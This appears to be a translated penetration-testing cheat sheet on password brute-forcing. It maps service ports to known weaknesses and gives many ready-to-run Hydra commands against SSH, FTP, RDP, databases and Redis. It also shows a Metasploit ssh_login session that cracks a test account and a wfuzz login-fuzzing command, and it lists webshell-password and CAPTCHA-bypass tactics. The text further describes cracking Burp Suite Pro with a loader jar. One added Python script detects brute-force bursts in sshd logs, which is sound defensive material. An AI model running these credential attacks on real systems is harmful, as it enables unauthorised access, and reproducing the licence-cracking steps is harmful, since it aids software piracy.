Common ports

1. Web (web vulnerabilities / sensitive directories)

Vulnerabilities in common third-party components: struts, thinkphp, jboss, ganglia, zabbix

80 web
80-89 web
8000-9090 web

2. Databases (weak password scanning)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

3. Special services (unauthenticated access / command execution / vulnerabilities)

443 SSL Heartbleed
873 Rsync unauthenticated access
5984 CouchDB http://xxx:5984/_utils/
6379 Redis unauthenticated access
7001,7002 WebLogic default weak passwords, deserialization
9200,9300 Elasticsearch; see WooYun: ElasticSearch command execution vulnerability on a Duowan server
11211 memcache unauthenticated access
27017,27018 MongoDB unauthenticated access
50000 SAP command execution
50070,50030 Hadoop default ports, unauthenticated access

4. Common ports (weak password scanning / port brute-forcing)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra routing, default password zebra
3389 Remote Desktop

Full port details

21 ftp

22 SSH

23 Telnet

80 web

80-89 web

161 SNMP

389 LDAP

443 SSL Heartbleed and some web vulnerability testing

445 SMB

512,513,514 Rexec

873 Rsync unauthenticated access

1025,111 NFS

1433 MSSQL

1521 Oracle (iSqlPlus ports: 5560, 7778)

2082/2083 cPanel hosting control panel login (common abroad)

2222 DA virtual hosting control panel login (common abroad)

2601,2604 zebra routing, default password zebra

3128 squid proxy default port; if no password is set, it can very likely be used to roam the internal network directly

3306 MySQL

3312/3311 kangle hosting control panel login

3389 Remote Desktop

4440 rundeck; see WooYun: using a Sina service to successfully roam Sina's internal network

5432 PostgreSQL

5900 vnc

5984 CouchDB http://xxx:5984/_utils/

6082 varnish; see WooYun: Varnish HTTP accelerator CLI unauthenticated access can easily lead to the site being tampered with directly or used as a proxy into the internal network

6379 Redis unauthenticated access

7001,7002 WebLogic default weak passwords, deserialization

7778 Kloxo hosting control panel login

8000-9090 all common web ports; some ops teams like to put admin backends on these non-80 ports

8080 Tomcat / WDCP hosting control panel, default weak passwords

8080,8089,9090 JBOSS

8083 Vestacp hosting control panel (common abroad)

8649 ganglia

8888 amh/LuManager hosting control panel default port

9200,9300 Elasticsearch; see WooYun: ElasticSearch command execution vulnerability on a Duowan server

10000 Virtualmin/Webmin server virtual hosting control panel

11211 memcache unauthenticated access

27017,27018 MongoDB unauthenticated access

28017 MongoDB statistics page

50000 SAP command execution

50070,50030 Hadoop default ports, unauthenticated access


Hydra

-R Resume from the previous run's progress.

-S Use an SSL connection.

-s PORT Specify a non-default port.

-l LOGIN Specify a single login name to attack.

-L FILE Specify a username wordlist.

-p PASS Lowercase: specify a single password. Rarely used; a password wordlist is normally used instead.

-P FILE Uppercase: specify a password wordlist.

-e ns Optional; n: try an empty password, s: try with the specified user and password.

-C FILE Use a colon-separated file in "login:password" format instead of -L/-P.

-M FILE Specify a file of targets, one per line.

-o FILE Specify the output file for results.

-f When -M is used, stop attacking a host once the first login/password pair is found.

-t TASKS Number of parallel tasks, default 16.

-w TIME Maximum timeout in seconds, default 30s.

-v / -V Show detailed progress.

service The service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, among others.
hydra -l root -P password.txt ssh://***.***.***.*** -vV -t 15
[STATUS] attack finished for ***.***.***.*** (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found

Enumerate multiple IPs: import an IP address file with -M

hydra -l root -P password.txt -M ip.txt ssh -o IPS.txt
ssh
hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V
ftp
hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V
rdp
hydra -L /root/user -P /root/passwd rdp://192.168.1.0 -f -o /root/crack.txt -V
mssql
hydra -L /root/user -P /root/passwd mssql://192.168.0.129 -f -o /root/crack.txt -v
mysql
hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt -v -s 3306
oracle
hydra -P /root/passwd oracle://192.168.0.129 -f -o /root/crack.txt -v
redis
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
postgresql weak password check
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql
enumerate multiple IPs
hydra -L /root/user -P /root/passlist -M /root/ip.txt -V -o /root/crack mysql -t 16
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f -o /root/crack.txt
hydra -L /root/user -P /root/passlist ftp://192.168.0.106 -vV -f -o /root/crack.txt
hydra -l sa -P /root/passlist mssql://192.168.0.103 -vV

Visual xhydra

Not much to say here.

MSF brute-force modules

Test IP: ***********

Test account: test

Test password: 123456

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > info

Name: SSH Login Check Scanner
Module: auxiliary/scanner/ssh/ssh_login
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
todb <[email protected]>

Check supported:
No

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts

Description:
This module will test ssh logins on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

References:
https://cvedetails.com/cve/CVE-1999-0502/

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS *********
RHOSTS => *********
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME test
USERNAME => test
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/
.ICEauthority .config .hushlogin .python_history Desktop Public
.Xauthority .dbus .local .viminfo Documents Templates
.bash_history .face .msf4 .vnc Downloads Videos
.bashrc .face.icon .pip .zsh_history Music tools
.cache .gnupg .profile .zshrc Pictures
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/pass
passlist password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/password.txt
PASS_FILE => /root/tools/穷举工具/password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/tools/穷举工具/password.txt no File containing passwords, one per line
RHOSTS ********** yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME test no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS teur
[-] The following options failed to validate: Value 'teur' is not valid for option 'STOP_ON_SUCCESS'.
STOP_ON_SUCCESS => false
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] ************:22 - Success: 'test:123456' 'Could not chdir to home directory /home/test: No such file or directory This account is currently not available. Could not chdir to home directory /home/test: No such file or directory This account is currently not available. '
[-] *************:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login


Usage
msfconsole
msf auxiliary(mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > run
set: set an option
show options: show the current settings
back: go back
info: show module information
exploit/run: run the module
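Seen from the defender's side, a run like the Hydra commands or the ssh_login session above leaves a dense burst of sshd "Failed password" lines from one source, sometimes followed by an "Accepted password" for the guessed account. The script below is an added example, not code from the original post or from Hydra or Metasploit: it parses constructed sshd log lines and flags source IPs with a burst of password failures inside a short window, recording whether a login succeeded afterwards. The log lines, the threshold of 4 failures and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines for the example (not real traffic); syslog lines
# carry no year, so 2024 is assumed when parsing timestamps.
SAMPLE_LOG = """\
Apr 11 13:28:01 host sshd[1201]: Failed password for root from 198.51.100.7 port 40001 ssh2
Apr 11 13:28:02 host sshd[1202]: Failed password for root from 198.51.100.7 port 40002 ssh2
Apr 11 13:28:02 host sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 40003 ssh2
Apr 11 13:28:03 host sshd[1204]: Failed password for test from 198.51.100.7 port 40004 ssh2
Apr 11 13:28:04 host sshd[1205]: Failed password for test from 198.51.100.7 port 40005 ssh2
Apr 11 13:28:05 host sshd[1206]: Accepted password for test from 198.51.100.7 port 40006 ssh2
Apr 11 13:40:00 host sshd[1300]: Failed password for alice from 203.0.113.9 port 50000 ssh2
Apr 11 13:41:00 host sshd[1301]: Accepted publickey for alice from 203.0.113.9 port 50001 ssh2
"""

# Matches both "Failed password for [invalid user] X" and "Accepted <method> for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(log_text, year=2024):
    """Return (timestamp, ip, user, result, method) tuples for auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"], m["method"]))
    return events

def detect(events, threshold=4, window_s=60):
    """Map each source IP that produced >= threshold password failures within
    window_s seconds to its failure count, the user names tried, and whether
    any login from that IP was accepted at or after the burst."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[3] == "Failed" and e[4] == "password"]
        for i in range(len(fails)):
            j = i + threshold - 1  # sliding window of `threshold` failures
            if j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= window_s:
                burst_end = fails[j][0]
                success_after = any(e[3] == "Accepted" and e[0] >= burst_end for e in evs)
                hits[ip] = {"failures": len(fails), "users": {e[2] for e in fails},
                            "success_after": success_after}
                break
    return hits
```

A hit with success_after set is the case that matters most: a guessed password was accepted, so the account needs a reset and the session a review, not just a firewall block.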

Email cracking

Admin panel password brute-forcing

Burp download: 🔰雨苁
I packaged a launcher
No background process

The source is just:
java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader.jar -noverify -jar burpsuite_pro.jar

Rename the downloaded Burp files as follows

How to use the exe

  • Create a shortcut
  • Pin to the Start screen

burploader-old.jar is the activation tool

java -jar burploader-old.jar

Usage instructions are on the 🔰雨苁 blog

wordpress

  • cmsmap brute-forcing

One-line webshell cracking

  • cheetah

Webshell password cracking

Admin panel cracking behind a CAPTCHA

  • Whether the CAPTCHA cookie can be reused
  • Whether it can be reused
  • Bypass
  • OCR recognition

wfuzz multi-threaded test with a million passwords

#example
wfuzz -c -z file,./passwd.txt -u url -d "username=root&passed=FUZZ"

Admin panels with token protection